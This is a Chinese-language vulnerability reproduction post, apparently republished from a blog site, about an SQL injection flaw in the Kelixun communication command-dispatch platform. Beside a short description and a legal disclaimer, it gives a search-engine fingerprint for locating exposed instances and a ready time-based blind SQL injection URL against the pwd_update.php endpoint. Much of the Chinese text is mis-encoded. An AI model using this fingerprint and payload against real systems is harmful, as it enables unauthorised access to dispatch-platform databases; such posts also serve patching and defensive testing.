漏洞描述
在20240318之前的福建科立訊通信指揮調(diào)度平臺中發(fā)現(xiàn)了一個漏洞。該漏洞被歸類為關(guān)鍵級別,影響文件/api/client/editemedia.php的未知部分。通過操縱參數(shù)number/enterprise_uuid可導(dǎo)致SQL注入。攻擊可能會遠程發(fā)起。
免責(zé)聲明
技術(shù)文章僅供參考,任何個人和組織使用網(wǎng)絡(luò)應(yīng)當(dāng)遵守憲法法律,遵守公共秩序,尊重社會公德,不得利用網(wǎng)絡(luò)從事危害國家安全、榮譽和利益,未經(jīng)授權(quán)請勿利用文章中的技術(shù)資料對任何計算機系統(tǒng)進行入侵操作。利用此文所提供的信息而造成的直接或間接后果和損失,均由使用者本人負責(zé)。本文所提供的工具僅用于學(xué)習(xí),禁止用于其他??!
漏洞集合
【傳送點】上千漏洞復(fù)現(xiàn)復(fù)現(xiàn)集合 exp poc 持續(xù)更新文章來源:http://www.zghlxwxcb.cn/news/detail-842968.html
資產(chǎn)確定
body="app/structure/departments.php" || app="指揮調(diào)度管理平臺"
漏洞復(fù)現(xiàn)
多個注入點文章來源地址http://www.zghlxwxcb.cn/news/detail-842968.html
/api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%
到了這里,關(guān)于【漏洞復(fù)現(xiàn)】科立訊通信指揮調(diào)度平臺editemedia.php sql注入漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!